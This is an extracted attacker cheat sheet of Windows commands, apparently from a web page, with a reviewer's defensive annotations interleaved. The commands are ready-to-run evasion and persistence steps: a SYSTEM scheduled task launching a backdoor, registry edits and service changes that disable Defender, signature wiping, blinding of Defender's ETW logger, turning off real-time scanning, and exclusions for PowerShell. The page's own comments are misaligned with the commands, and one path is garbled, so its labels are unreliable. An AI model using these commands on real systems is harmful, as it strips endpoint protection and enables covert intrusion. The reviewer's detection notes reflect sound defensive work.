![]() ![]() ![]()
# Review: this listing was flattened onto one line by extraction. Line breaks are
# restored here; command order, prompts and quoting are left exactly as found.
# The page's own comments appear out of step with the commands they sit next to,
# so they are kept in place and reviewer notes are marked "Review:".

# OR
# Review: scheduled-task persistence (MITRE ATT&CK T1053.005). These lines only
# build trigger/principal/action objects for a daily task running as SYSTEM at the
# highest run level; nothing in this excerpt registers them. Task creation is
# recorded as Security event 4698 (needs object-access auditing) and in the
# Microsoft-Windows-TaskScheduler/Operational log. Hunt for tasks whose action
# launches cmd.exe against a binary in a user-writable path such as C:\temp.
$T = New-ScheduledTaskTrigger -Daily -At " 11:05:00 AM "
$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM " -RunLevel Highest
# Powershell
$A = New-ScheduledTaskAction -Execute "cmd.exe " -Argument "/c C:\temp\backdoor.exe "
$T = New-ScheduledTaskTrigger -Daily -At 9am

# Review: policy-key edits that switch off Defender components (T1562.001).
# They require administrative rights. With Tamper Protection enabled, Defender is
# documented to ignore or block these values, and blocked attempts are logged as
# event 5013. Changes that do land appear as event 5007 (configuration changed) in
# Microsoft-Windows-Windows Defender/Operational and as registry-write telemetry
# (e.g. Sysmon event 13) on the key named below.
Reg add "HKLM\Software\Policies\Microsoft\Windows Defender " /v "DisableAntiVirus " /t REG_DWORD /d "1 " /f
# NOTE(review): the next line is a section heading from the page, not a command;
# no firewall-related command appears in this excerpt.
Disable Windows Firewall
Reg add "HKLM\Software\Policies\Microsoft\Windows Defender " /v "DisableAntiSpyware " /t REG_DWORD /d "1 " /f
# Review: removes the whole Defender policy key and every value under it.
Reg delete "HKLM\Software\Policies\Microsoft\Windows Defender " /f
# Review: service Start value 4 means "disabled"; alert on any change to the Start
# value of security-product services.
Reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService " /v "Start " /t REG_DWORD /d "4 " /f
# Disable Windows Defender Security Center

# Review: signature removal. Process-creation logging with command lines (Security
# 4688 or Sysmon event 1) captures MpCmdRun.exe with -RemoveDefinitions. Signature
# version and age can be checked through Get-MpComputerStatus, e.g.
# AntivirusSignatureVersion and AntivirusSignatureLastUpdated.
# NOTE(review): the "\.9-0\" path segment below looks like a version directory
# damaged by extraction; it is left as found.
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe " -RemoveDefinitions -All
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\.9-0\MpCmdRun.exe " -RemoveDefinitions -All
# Remove signatures (if Internet connection is present, they will be downloaded again):
# Wipe currently stored definitions
# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\
MpCmdRun.exe -RemoveDefinitions -All

# Review: sets Start to 0 for the DefenderApiLogger autologger session (T1562.006,
# indicator blocking). Autologger settings are read when the session starts at
# boot, so monitor writes under
# HKLM\System\CurrentControlSet\Control\WMI\Autologger\ rather than waiting for
# the telemetry gap to appear.
Reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger " /v "Start " /t REG_DWORD /d "0 " /f

# Review: Set-MpPreference changes to script scanning, IOAV (downloaded files and
# attachments) scanning and real-time monitoring. Turning real-time protection
# off raises event 5001; other preference changes raise 5007. Tamper Protection
# is documented to block the real-time monitoring change. PowerShell script-block
# logging (event 4104) records the cmdlet invocation itself.
PS C:\ > Set-MpPreference -DisableScriptScanning 1
# Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
PS C:\ > Set-MpPreference -DisableIOAVProtection $true
# Disable AMSI (set to 0 to enable)
PS C:\ > Set-MpPreference -DisableRealtimeMonitoring $true
# Review: read-only status query; fields such as RealTimeProtectionEnabled,
# IoavProtectionEnabled and IsTamperProtected show the resulting state and are
# useful for fleet-wide compliance checks.
Get-MpComputerStatus
# Disable scanning all downloaded files and attachments, disable AMSI (reactive)
![]()
Set-MpPreference -DisableRealtimeMonitoring $true

# Exclude a process / location
# Review: exclusions (T1562.001). Set-MpPreference replaces the existing list,
# Add-MpPreference appends to it. A process exclusion stops scanning of files
# that process opens. Current exclusions are listed by Get-MpPreference
# (ExclusionProcess, ExclusionPath) and each change is logged as event 5007 with
# the affected value under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions.
# Centrally managed hosts can refuse locally added exclusions through the
# "local administrator merge" policy (DisableLocalAdminMerge).
Set-MpPreference -ExclusionProcess "word.exe ", "vmwp.exe "
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
Add-MpPreference -ExclusionPath C:\Video, C:\install
![]()